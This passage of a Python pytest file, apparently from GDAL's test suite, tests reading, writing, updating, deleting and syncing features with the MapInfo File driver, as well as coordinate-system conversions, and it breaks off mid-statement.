field\n\n\ndef test_ogr_mitab_21(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"ogr_mitab_21.tab\"\n )\n lyr = ds.CreateLayer(\"test\")\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (0 0)\"))\n with gdal.quiet_errors():\n lyr.CreateFeature(feat)\n ds = None\n\n ds = ogr.Open(tmp_vsimem / \"ogr_mitab_21.tab\")\n lyr = ds.GetLayer(0)\n feat = lyr.GetNextFeature()\n if feat.GetField(\"FID\") != 1:\n feat.DumpReadable()\n pytest.fail()\n ds = None\n\n\n###############################################################################\n# Test append in update mode\n\n\n@pytest.mark.parametrize(\"nb_features\", (2, 1000))\ndef test_ogr_mitab_22(tmp_vsimem, nb_features):\n\n filename = tmp_vsimem / \"ogr_mitab_22.tab\"\n\n if nb_features == 2:\n nb_runs = 2\n else:\n nb_runs = 1\n\n # When doing 2 runs, in the second one, we create an empty\n # .tab and then open it for update. 
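\n\n###############################################################################\n# A note in code form: the gdal.config_option() context manager used above\n# restores the previous value on exit, unlike the manual\n# gdal.SetConfigOption(..., value) / gdal.SetConfigOption(..., None) pairing\n# in test_ogr_mitab_20. Minimal sketch:\n\n\ndef config_option_scope_sketch():\n    from osgeo import gdal\n\n    with gdal.config_option("MITAB_BOUNDS_FILE", "data/mitab/mitab_bounds.txt"):\n        # the option is visible to the driver only inside this block\n        assert gdal.GetConfigOption("MITAB_BOUNDS_FILE") == "data/mitab/mitab_bounds.txt"\n    # outside the block, the previous value (None unless set elsewhere) applies\n\n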
This can trigger specific bugs\n for j in range(nb_runs):\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n if j == 0:\n i = 0\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (i, i))\n )\n if lyr.CreateFeature(feat) != 0:\n print(i)\n pytest.fail(nb_features)\n ds = None\n\n for i in range(nb_features - (1 - j)):\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1 + (1 - j))\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (i + (1 - j), i + (1 - j)))\n )\n if lyr.CreateFeature(feat) != 0:\n print(i)\n pytest.fail(nb_features)\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n for i in range(nb_features):\n f = lyr.GetNextFeature()\n assert f is not None and f.GetField(\"ID\") == i + 1, nb_features\n ds = None\n\n\n###############################################################################\n# Test creating features then reading\n\n\n@pytest.mark.parametrize(\"nb_features\", (0, 1, 2, 100, 1000))\ndef test_ogr_mitab_23(tmp_vsimem, nb_features):\n\n filename = tmp_vsimem / \"ogr_mitab_23.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n for i in range(nb_features):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (0 0)\"))\n lyr.CreateFeature(feat)\n\n lyr.ResetReading()\n for i in range(nb_features):\n f = lyr.GetNextFeature()\n assert f is not None and f.GetField(\"ID\") == i + 1, nb_features\n f = lyr.GetNextFeature()\n assert f is None\n ds = None\n\n\n###############################################################################\n# Test creating features then reading then creating again then reading\n\n\n@pytest.mark.parametrize(\"nb_features\", (2, 100, 1000))\ndef test_ogr_mitab_24(tmp_vsimem, nb_features):\n\n filename = tmp_vsimem / \"ogr_mitab_24.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n for i in range(int(nb_features / 2)):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (0 0)\"))\n lyr.CreateFeature(feat)\n\n lyr.ResetReading()\n for i in range(int(nb_features / 2)):\n f = lyr.GetNextFeature()\n assert f is not None and f.GetField(\"ID\") == i + 1, nb_features\n f = lyr.GetNextFeature()\n assert f is None\n\n for i in range(int(nb_features / 2)):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", nb_features / 2 + i + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (0 0)\"))\n lyr.CreateFeature(feat)\n\n lyr.ResetReading()\n for i in range(nb_features):\n f = lyr.GetNextFeature()\n assert f is not None and f.GetField(\"ID\") == i + 1, nb_features\n f = lyr.GetNextFeature()\n assert f is None\n\n ds = None\n\n\n###############################################################################\n# Test that opening in update mode without doing any change does not alter\n# file\n\n\n@pytest.mark.parametrize(\"nb_features\", (2, 1000))\ndef test_ogr_mitab_25(tmp_path, nb_features):\n\n filename = tmp_path / 
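\n\n###############################################################################\n# Sketch of the append-in-update-mode cycle that test_ogr_mitab_22 stresses\n# in a loop: reopen, append a single feature, close. Names are illustrative;\n# the layer is assumed to have an integer "ID" field as above.\n\n\ndef append_one_feature(filename, id_value):\n    from osgeo import ogr\n\n    ds = ogr.Open(filename, update=1)\n    lyr = ds.GetLayer(0)\n    f = ogr.Feature(lyr.GetLayerDefn())\n    f.SetField("ID", id_value)\n    f.SetGeometryDirectly(ogr.CreateGeometryFromWkt("POINT (0 0)"))\n    assert lyr.CreateFeature(f) == 0\n    ds = None\n\n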
\"ogr_mitab_25.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n for i in range(int(nb_features / 2)):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (i, i)))\n lyr.CreateFeature(feat)\n ds = None\n\n if sys.platform.startswith(\"linux\"):\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n os.system(f'touch -d \"1 minute ago\" {filename.with_suffix(ext)}')\n\n mtime_dict = {}\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n mtime_dict[ext] = filename.with_suffix(ext).stat().st_mtime\n\n if not sys.platform.startswith(\"linux\"):\n time.sleep(1)\n\n # Try without doing anything\n ds = ogr.Open(filename, update=1)\n ds = None\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n mtime = filename.with_suffix(ext).stat().st_mtime\n assert mtime_dict[ext] == mtime, f\"mtime of {ext} has changed !\"\n\n # Try by reading all features\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n lyr.GetFeatureCount(1)\n ds = None\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n mtime = filename.with_suffix(ext).stat().st_mtime\n assert mtime_dict[ext] == mtime, f\"mtime of {ext} has changed !\"\n\n # Try by reading all features with a spatial index\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n lyr.SetSpatialFilterRect(0.5, 0.5, 1.5, 1.5)\n lyr.GetFeatureCount(1)\n ds = None\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n mtime = filename.with_suffix(ext).stat().st_mtime\n assert mtime_dict[ext] == mtime, f\"mtime of {ext} has changed !\"\n\n if test_cli_utilities.get_test_ogrsf_path() is not None:\n ret = gdaltest.runexternal(\n test_cli_utilities.get_test_ogrsf_path() + f\" -ro -fsf {filename}\"\n )\n assert ret.find(\"INFO\") != -1 and ret.find(\"ERROR\") == -1\n\n\n###############################################################################\n# Test DeleteFeature()\n\n\n@pytest.mark.parametrize(\"nb_features\", (2, 1000))\ndef test_ogr_mitab_26(tmp_vsimem, nb_features):\n\n filename = tmp_vsimem / \"ogr_mitab_26.tab\"\n\n if nb_features == 2:\n nb_runs = 2\n else:\n nb_runs = 1\n for j in range(nb_runs):\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n for i in range(nb_features):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", i + 1)\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (i, i))\n )\n lyr.CreateFeature(feat)\n\n if nb_features == 2:\n assert lyr.DeleteFeature(int(nb_features / 2)) == 0, j\n else:\n for k in range(int(nb_features / 2)):\n assert lyr.DeleteFeature(int(nb_features / 4) + k) == 0, j\n\n if j == 1:\n # Expected failure : already deleted feature\n ret = lyr.DeleteFeature(int(nb_features / 2))\n if ret != ogr.OGRERR_NON_EXISTING_FEATURE:\n print(j)\n pytest.fail(nb_features)\n\n feat = lyr.GetFeature(int(nb_features / 2))\n if feat is not None:\n print(j)\n pytest.fail(nb_features)\n\n # Expected failure : illegal feature id\n ret = lyr.DeleteFeature(nb_features + 1)\n if ret != ogr.OGRERR_NON_EXISTING_FEATURE:\n print(j)\n pytest.fail(nb_features)\n\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == nb_features / 2\n ds = None\n\n # This used to trigger a bug in DAT record deletion during implementation...\n if 
nb_features == 1000:\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n lyr.DeleteFeature(245)\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == nb_features / 2 - 1\n ds = None\n\n\n###############################################################################\n# Test SetFeature()\n\n\ndef test_ogr_mitab_27(tmp_vsimem):\n\n filename = tmp_vsimem / \"ogr_mitab_27.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"intfield\", ogr.OFTInteger))\n lyr.CreateField(ogr.FieldDefn(\"realfield\", ogr.OFTReal))\n lyr.CreateField(ogr.FieldDefn(\"stringfield\", ogr.OFTString))\n\n # Invalid call : feature without FID\n f = ogr.Feature(lyr.GetLayerDefn())\n with gdal.quiet_errors():\n ret = lyr.SetFeature(f)\n assert ret != 0\n\n # Invalid call : feature with FID <= 0\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetFID(0)\n with gdal.quiet_errors():\n ret = lyr.SetFeature(f)\n assert ret != 0\n\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetField(\"intfield\", 1)\n f.SetField(\"realfield\", 2.34)\n f.SetField(\"stringfield\", \"foo\")\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (1 2)\"))\n lyr.CreateFeature(f)\n fid = f.GetFID()\n\n # Invalid call : feature with FID > feature_count\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetFID(2)\n with gdal.quiet_errors():\n ret = lyr.SetFeature(f)\n assert ret != 0\n\n # Update previously created object with blank feature\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetFID(fid)\n lyr.SetFeature(f)\n\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if (\n f.GetField(\"intfield\") != 0\n or f.GetField(\"realfield\") != 0\n or f.GetField(\"stringfield\") != \"\"\n or f.GetGeometryRef() is not None\n ):\n f.DumpReadable()\n pytest.fail()\n\n f.SetField(\"intfield\", 1)\n f.SetField(\"realfield\", 2.34)\n f.SetField(\"stringfield\", \"foo\")\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (2 3)\"))\n lyr.SetFeature(f)\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if (\n f.GetField(\"intfield\") != 1\n or f.GetField(\"realfield\") != 2.34\n or f.GetField(\"stringfield\") != \"foo\"\n or f.GetGeometryRef() is None\n ):\n f.DumpReadable()\n pytest.fail()\n\n lyr.DeleteFeature(f.GetFID())\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n # SetFeature() on a deleted feature\n lyr.SetFeature(f)\n\n f = lyr.GetFeature(1)\n if (\n f.GetField(\"intfield\") != 1\n or f.GetField(\"realfield\") != 2.34\n or f.GetField(\"stringfield\") != \"foo\"\n or f.GetGeometryRef() is None\n ):\n f.DumpReadable()\n pytest.fail()\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n\n f = lyr.GetFeature(1)\n # SetFeature() with identical feature : no-op\n assert lyr.SetFeature(f) == 0\n ds = None\n\n stat = gdal.VSIStatL(filename.with_suffix(\".map\"))\n old_size = stat.size\n\n # This used to trigger a bug: when using SetFeature() repeatedly, we\n # can create object blocks in the .map that are made only of deleted\n # objects.\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n\n f = lyr.GetFeature(1)\n for _ in range(100):\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (2 3)\"))\n assert lyr.SetFeature(f) == 0\n ds = None\n\n stat = gdal.VSIStatL(filename.with_suffix(\".map\"))\n assert stat.size == old_size\n\n ds = ogr.Open(filename, update=1)\n lyr = 
ds.GetLayer(0)\n\n f = lyr.GetFeature(1)\n # SetFeature() with identical geometry : rewrite only attributes\n f.SetField(\"intfield\", -1)\n assert lyr.SetFeature(f) == 0\n\n f = lyr.GetFeature(1)\n if (\n f.GetField(\"intfield\") != -1\n or f.GetField(\"realfield\") != 2.34\n or f.GetField(\"stringfield\") != \"foo\"\n or f.GetGeometryRef() is None\n ):\n f.DumpReadable()\n pytest.fail()\n\n ds = None\n\n\n###############################################################################\n\n\ndef generate_permutation(n):\n tab = [i for i in range(n)]\n for _ in range(10 * n):\n ind = random.randint(0, n - 1)\n tmp = tab[0]\n tab[0] = tab[ind]\n tab[ind] = tmp\n return tab\n\n\n###############################################################################\n# Test updating object blocks with deleted objects\n\n\ndef test_ogr_mitab_28(tmp_vsimem):\n\n filename = tmp_vsimem / \"ogr_mitab_28.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n # Generate 10x10 grid\n N2 = 10\n N = N2 * N2\n for n in generate_permutation(N):\n x = int(n / N2)\n y = n % N2\n f = ogr.Feature(lyr.GetLayerDefn())\n # f.SetGeometry(ogr.CreateGeometryFromWkt('POINT(%d %d)' % (x,y)))\n f.SetGeometry(\n ogr.CreateGeometryFromWkt(\n \"LINESTRING(%d %d,%f %f,%f %f)\" % (x, y, x + 0.1, y, x + 0.2, y)\n )\n )\n lyr.CreateFeature(f)\n\n # Delete all features\n for i in range(N):\n lyr.DeleteFeature(i + 1)\n\n # Set deleted features\n i = 0\n permutation = generate_permutation(N)\n for n in permutation:\n x = int(n / N2)\n y = n % N2\n f = ogr.Feature(lyr.GetLayerDefn())\n # f.SetGeometry(ogr.CreateGeometryFromWkt('POINT(%d %d)' % (x,y)))\n f.SetGeometry(\n ogr.CreateGeometryFromWkt(\n \"LINESTRING(%d %d,%f %f,%f %f)\" % (x, y, x + 0.1, y, x + 0.2, y)\n )\n )\n f.SetFID(i + 1)\n i = i + 1\n lyr.SetFeature(f)\n\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n i = 0\n # Check sequential enumeration\n for f in lyr:\n g = f.GetGeometryRef()\n (x, y, _) = g.GetPoint(0)\n n = permutation[i]\n x_ref = int(n / N2)\n y_ref = n % N2\n assert abs(x - x_ref) + abs(y - y_ref) <= 0.1\n i = i + 1\n\n # Check spatial index integrity\n for n in range(N):\n x = int(n / N2)\n y = n % N2\n lyr.SetSpatialFilterRect(x - 0.5, y - 0.5, x + 0.5, y + 0.5)\n assert lyr.GetFeatureCount() == 1\n\n ds = None\n\n\n###############################################################################\n# Test updating a file with compressed geometries.\n\n\ndef test_ogr_mitab_29(tmp_path):\n\n gdaltest.unzip(tmp_path / \"cache\", \"data/mitab/compr_symb_deleted_records.zip\")\n if not (tmp_path / \"cache\" / \"compr_symb_deleted_records.tab\").exists():\n pytest.skip(\"Failed to extract compr_symb_deleted_records.tab\")\n\n shutil.copy(tmp_path / \"cache\" / \"compr_symb_deleted_records.tab\", tmp_path)\n shutil.copy(tmp_path / \"cache\" / \"compr_symb_deleted_records.dat\", tmp_path)\n shutil.copy(tmp_path / \"cache\" / \"compr_symb_deleted_records.id\", tmp_path)\n shutil.copy(tmp_path / \"cache\" / \"compr_symb_deleted_records.map\", tmp_path)\n\n # Is a 100x100 point grid with only the 4 edge lines left (compressed points)\n ds = ogr.Open(tmp_path / \"compr_symb_deleted_records.tab\", update=1)\n lyr = ds.GetLayer(0)\n # Re-add the 98x98 interior points\n N2 = 98\n N = N2 * N2\n permutation = generate_permutation(N)\n for n in permutation:\n x = 1 + int(n / 
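\n\n###############################################################################\n# Side note on generate_permutation() above: it swaps slot 0 with a random\n# slot 10*n times, which mixes the list but is not a textbook shuffle. The\n# standard-library equivalent (an unbiased Fisher-Yates) would be:\n\n\ndef generate_permutation_alt(n):\n    import random\n\n    tab = list(range(n))\n    random.shuffle(tab)\n    return tab\n\n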
N2)\n y = 1 + n % N2\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometry(ogr.CreateGeometryFromWkt(\"POINT(%d %d)\" % (x, y)))\n lyr.CreateFeature(f)\n ds = None\n\n # Check grid integrity after reopening\n ds = ogr.Open(tmp_path / \"compr_symb_deleted_records.tab\")\n lyr = ds.GetLayer(0)\n N2 = 100\n N = N2 * N2\n for n in range(N):\n x = int(n / N2)\n y = n % N2\n lyr.SetSpatialFilterRect(x - 0.01, y - 0.01, x + 0.01, y + 0.01)\n if lyr.GetFeatureCount() != 1:\n print(n)\n pytest.fail(\"%f %f %f %f\" % (x - 0.01, y - 0.01, x + 0.01, y + 0.01))\n ds = None\n\n\n###############################################################################\n# Test SyncToDisk() in create/update mode\n\n\n@pytest.mark.parametrize(\"update\", (0, 1), ids=(\"create_mode\", \"update_mode\"))\ndef test_ogr_mitab_30(tmp_path, update):\n\n filename = tmp_path / \"ogr_mitab_30.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\", options=[\"BOUNDS=0,0,100,100\"])\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n assert lyr.SyncToDisk() == 0\n\n ds2 = ogr.Open(filename)\n lyr2 = ds2.GetLayer(0)\n assert lyr2.GetFeatureCount() == 0 and lyr2.GetLayerDefn().GetFieldCount() == 1\n ds2 = None\n\n # Check that the files are not updated in between\n if sys.platform.startswith(\"linux\"):\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n os.system(f'touch -d \"1 minute ago\" {filename.with_suffix(ext)}')\n\n stat = {}\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n stat[ext] = gdal.VSIStatL(filename.with_suffix(ext))\n\n if not sys.platform.startswith(\"linux\"):\n time.sleep(1)\n\n assert lyr.SyncToDisk() == 0\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n stat2 = gdal.VSIStatL(filename.with_suffix(ext))\n assert stat[ext].size == stat2.size and stat[ext].mtime == stat2.mtime\n\n if update == 1:\n ds = None\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n\n for j in range(100):\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetField(\"ID\", j + 1)\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (%d %d)\" % (j, j)))\n lyr.CreateFeature(feat)\n feat = None\n\n if not (j <= 10 or (j % 5) == 0):\n continue\n\n for i in range(2):\n ret = lyr.SyncToDisk()\n assert ret == 0\n\n if i == 0:\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n stat[ext] = gdal.VSIStatL(filename.with_suffix(ext))\n else:\n for ext in (\".map\", \".tab\", \".dat\", \".id\"):\n stat2 = gdal.VSIStatL(filename.with_suffix(ext))\n if stat[ext].size != stat2.size:\n print(j)\n pytest.fail(str(i))\n\n ds2 = ogr.Open(filename)\n lyr2 = ds2.GetLayer(0)\n assert lyr2.GetFeatureCount() == j + 1, i\n feat2 = lyr2.GetFeature(j + 1)\n if feat2.GetField(\n \"ID\"\n ) != j + 1 or feat2.GetGeometryRef().ExportToWkt() != \"POINT (%d %d)\" % (\n j,\n j,\n ):\n print(i)\n feat2.DumpReadable()\n pytest.fail(str(j))\n lyr2.ResetReading()\n for _ in range(j + 1):\n feat2 = lyr2.GetNextFeature()\n if feat2.GetField(\n \"ID\"\n ) != j + 1 or feat2.GetGeometryRef().ExportToWkt() != \"POINT (%d %d)\" % (\n j,\n j,\n ):\n print(i)\n feat2.DumpReadable()\n pytest.fail(str(j))\n ds2 = None\n\n ds = None\n\n\n###############################################################################\n# Check read support of non-spatial .tab/.dat without .map or .id (#5718)\n# We only check read-only behaviour though.\n\n\ndef test_ogr_mitab_32():\n\n for update in (0, 1):\n ds = ogr.Open(\"data/mitab/aspatial-table.tab\", update=update)\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 2, 
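\n\n###############################################################################\n# Minimal sketch of the SyncToDisk() contract that test_ogr_mitab_30 relies\n# on: after a successful SyncToDisk(), a second handle can read the flushed\n# state while the writing handle stays open. The filename is illustrative.\n\n\ndef sync_to_disk_sketch(filename="/vsimem/sync_sketch.tab"):\n    from osgeo import ogr\n\n    ds = ogr.GetDriverByName("MapInfo File").CreateDataSource(filename)\n    lyr = ds.CreateLayer("test")\n    lyr.CreateField(ogr.FieldDefn("ID", ogr.OFTInteger))\n    assert lyr.SyncToDisk() == 0\n    ds2 = ogr.Open(filename)\n    assert ds2.GetLayer(0).GetLayerDefn().GetFieldCount() == 1\n    ds2 = None\n    ds = None\n\n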
update\n f = lyr.GetNextFeature()\n assert (\n f.GetField(\"a\") == 1 and f.GetField(\"b\") == 2 and f.GetField(\"d\") == \"hello\"\n ), update\n f = lyr.GetFeature(2)\n assert f.GetField(\"a\") == 4, update\n ds = None\n\n\n###############################################################################\n# Test opening and modifying a file created with MapInfo that consists of\n# a single object block, without index block\n\n\ndef test_ogr_mitab_33(tmp_path):\n\n for update in (0, 1):\n ds = ogr.Open(\"data/mitab/single_point_mapinfo.tab\", update=update)\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 1, update\n f = lyr.GetNextFeature()\n assert f.GetField(\"toto\") == \"\", update\n ds = None\n\n # Test adding a new object\n shutil.copy(\"data/mitab/single_point_mapinfo.tab\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.dat\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.id\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.map\", tmp_path)\n\n ds = ogr.Open(tmp_path / \"single_point_mapinfo.tab\", update=1)\n lyr = ds.GetLayer(0)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1363180 7509810)\"))\n lyr.CreateFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(tmp_path / \"single_point_mapinfo.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 2\n f = lyr.GetNextFeature()\n assert f is not None\n f = lyr.GetNextFeature()\n assert f is not None\n ds = None\n\n # Test replacing the existing object\n shutil.copy(\"data/mitab/single_point_mapinfo.tab\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.dat\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.id\", tmp_path)\n shutil.copy(\"data/mitab/single_point_mapinfo.map\", tmp_path)\n\n ds = ogr.Open(tmp_path / \"single_point_mapinfo.tab\", update=1)\n lyr = ds.GetLayer(0)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetFID(1)\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1363180 7509810)\"))\n lyr.SetFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(tmp_path / \"single_point_mapinfo.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 1\n f = lyr.GetNextFeature()\n assert f is not None\n ds = None\n\n\n###############################################################################\n# Test updating a line that spans over several coordinate blocks\n\n\ndef test_ogr_mitab_34(tmp_vsimem):\n\n filename = tmp_vsimem / \"ogr_mitab_34.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"ogr_mitab_34\", options=[\"BOUNDS=-1000,0,1000,3000\"])\n lyr.CreateField(ogr.FieldDefn(\"dummy\", ogr.OFTString))\n geom = ogr.Geometry(ogr.wkbLineString)\n for i in range(1000):\n geom.AddPoint_2D(i, i)\n for _ in range(2):\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometry(geom)\n lyr.CreateFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n lyr.GetNextFeature() # seek to another object\n geom = f.GetGeometryRef()\n geom.SetPoint_2D(0, -1000, 3000)\n lyr.SetFeature(f)\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n geom = f.GetGeometryRef()\n assert geom.GetX(0) == pytest.approx(-1000, abs=1e-2) and geom.GetY(\n 0\n ) == pytest.approx(3000, abs=1e-2)\n for i in range(999):\n assert geom.GetX(i + 1) == pytest.approx((i + 1), abs=1e-2) and geom.GetY(\n i + 1\n ) == pytest.approx((i + 1), abs=1e-2)\n f = lyr.GetNextFeature()\n geom = 
f.GetGeometryRef()\n for i in range(1000):\n assert geom.GetX(i) == pytest.approx((i), abs=1e-2) and geom.GetY(\n i\n ) == pytest.approx((i), abs=1e-2)\n ds = None\n\n\n###############################################################################\n# Test SRS support\n\n\ndef get_srs_from_coordsys(workdir, coordsys):\n mif_filename = workdir / \"foo.mif\"\n f = gdal.VSIFOpenL(mif_filename, \"wb\")\n content = (\n \"\"\"Version 300\nCharset \"Neutral\"\nDelimiter \",\"\n%s\nColumns 1\n foo Char(254)\nData\n\nNONE\n\"\"\"\n % coordsys\n )\n content = content.encode(\"ascii\")\n gdal.VSIFWriteL(content, 1, len(content), f)\n gdal.VSIFCloseL(f)\n\n f = gdal.VSIFOpenL(mif_filename.with_suffix(\".mid\"), \"wb\")\n content = '\"\"\\n'\n content = content.encode(\"ascii\")\n gdal.VSIFWriteL(content, 1, len(content), f)\n gdal.VSIFCloseL(f)\n\n ds = ogr.Open(mif_filename)\n srs = ds.GetLayer(0).GetSpatialRef()\n if srs is not None:\n srs = srs.Clone()\n\n gdal.Unlink(mif_filename)\n gdal.Unlink(mif_filename.with_suffix(\".mid\"))\n\n return srs\n\n\ndef get_coordsys_from_srs(workdir, srs):\n mif_filename = workdir / \"foo.mif\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(mif_filename)\n lyr = ds.CreateLayer(\"foo\", srs=srs)\n lyr.CreateField(ogr.FieldDefn(\"foo\"))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(0 0)\"))\n lyr.CreateFeature(f)\n ds = None\n f = gdal.VSIFOpenL(mif_filename, \"rb\")\n data = gdal.VSIFReadL(1, 10000, f).decode(\"ascii\")\n gdal.VSIFCloseL(f)\n gdal.Unlink(mif_filename)\n gdal.Unlink(mif_filename.with_suffix(\".mid\"))\n data = data[data.find(\"CoordSys\") :]\n data = data[0 : data.find(\"\\n\")]\n return data\n\n\ndef test_ogr_mitab_35(tmp_vsimem):\n\n # Local/non-earth\n srs = osr.SpatialReference()\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys NonEarth Units \"m\"'\n\n srs = osr.SpatialReference('LOCAL_CS[\"foo\"]')\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys NonEarth Units \"m\"'\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert wkt in (\n 'LOCAL_CS[\"Nonearth\",UNIT[\"Meter\",1]]',\n 'LOCAL_CS[\"Nonearth\",UNIT[\"Meter\",1],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH]]',\n )\n\n # Test units\n for mif_unit in [\n \"mi\",\n \"km\",\n \"in\",\n \"ft\",\n \"yd\",\n \"mm\",\n \"cm\",\n \"m\",\n \"survey ft\",\n \"nmi\",\n \"li\",\n \"ch\",\n \"rd\",\n ]:\n coordsys = 'CoordSys NonEarth Units \"%s\"' % mif_unit\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n # print(srs)\n got_coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == got_coordsys, srs\n\n # Geographic\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 104\"\n srs = 